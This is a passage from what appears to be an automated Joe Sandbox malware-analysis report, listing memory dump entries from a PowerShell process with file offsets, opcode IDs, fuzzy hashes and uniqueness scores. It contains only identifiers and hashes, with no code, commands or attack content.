                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e02ae33809791ddd97b09d2722740fd97a7de001756d17310698090084d7ef8b
                                                                • Instruction ID: c20b91519a6583dc2aafe52ddf6a1edbbab5d1395054f47eb6c58e272ddb571c
                                                                • Opcode Fuzzy Hash: e02ae33809791ddd97b09d2722740fd97a7de001756d17310698090084d7ef8b
                                                                • Instruction Fuzzy Hash: 40D05E35016248AFC341CB28EC8ADC2BFB8EF1A22030540C2F4448B233D631A810CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 469792753364831488761da25e47c48a4ad85c8bad19babb7371229e86c5972a
                                                                • Instruction ID: dcd0bba781876f7f764e9281377e831a65099c8063dd9e3bc1ef421b3fd79126
                                                                • Opcode Fuzzy Hash: 469792753364831488761da25e47c48a4ad85c8bad19babb7371229e86c5972a
                                                                • Instruction Fuzzy Hash: 47D05E39200220DFC300EF68E408E99B7A9EF4C311F1180ABEA0987322CA36DC008BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e279e49c583056268ce9138570ab1d473614632c6431bebb8a8b77a940dbe924
                                                                • Instruction ID: b12549f289bb7e624c064ffe47c0d4e1daf615dbc8e5780b9347b3bc8d39aec6
                                                                • Opcode Fuzzy Hash: e279e49c583056268ce9138570ab1d473614632c6431bebb8a8b77a940dbe924
                                                                • Instruction Fuzzy Hash: 02D0A93511A3848FC301CB68E9868E13FF8AE0A51130900C2E048CBB32CA24B844C792
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6818941f8ce87d06f3426c06b0377c9ca705664782424a9b84cbc9aa7345f214
                                                                • Instruction ID: a06eb87192045832159c70c98e5485087627207540be2844d37665ca637cde17
                                                                • Opcode Fuzzy Hash: 6818941f8ce87d06f3426c06b0377c9ca705664782424a9b84cbc9aa7345f214
                                                                • Instruction Fuzzy Hash: 6AD0C97AB04105CFDB10CFA5F884AAEB7B4FF44329F2145A6D61597221D331A916CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                                                                • Instruction ID: 1bb21599ff55eb530763ef50e501e11e3d10e1ae52257aae7359bdcba8af5d6f
                                                                • Opcode Fuzzy Hash: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                                                                • Instruction Fuzzy Hash: 08D06C39A000198BCF04CA88E8546DCF7B0FB88329F1480AAD918A7291C77AA956CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be4e4538fcdc23a73ed46f9ff7aad6c0639940baaf97a8f41d45a38db9fe12d0
                                                                • Instruction ID: f2f63558b2390102dc2a798221277bf66e21df0972adc7d4c685201ff893d139
                                                                • Opcode Fuzzy Hash: be4e4538fcdc23a73ed46f9ff7aad6c0639940baaf97a8f41d45a38db9fe12d0
                                                                • Instruction Fuzzy Hash: 59C08C3AF010098FCB00CB98F8848DCFB75FBC8325B01C022E1018B101CB31A121DB00
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93c99aed1849ffec89d4316576ad889b90df72cb35223b03c097c9ed42a38e8d
                                                                • Instruction ID: f3f4e28c362cb980629608201d3cd3842ae894cfc02c1643a11554c2ef5569ad
                                                                • Opcode Fuzzy Hash: 93c99aed1849ffec89d4316576ad889b90df72cb35223b03c097c9ed42a38e8d
                                                                • Instruction Fuzzy Hash: E2C09B555091C00FCF12B675597D1D17F215FF9751F0542D78C8545047D25B0515DBD3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                                                • Instruction ID: 48dd8479d5063d4be22e798b7a5bb2e74f213407087f6ef6f31ceb787385eb93
                                                                • Opcode Fuzzy Hash: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                                                • Instruction Fuzzy Hash: 82C0927A150208EFC740DF69E848C45BBB8EF19770711C0A1FA088B332C732E820DA94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                • Instruction ID: 96a74fec5220f98754945e00ce640a92889f3d2d232068f8612b65c1e83e2114
                                                                • Opcode Fuzzy Hash: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                • Instruction Fuzzy Hash: B4B092351502088F82009B68E448C4073E8AB08A253114090E10C8B232C621FC008A40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions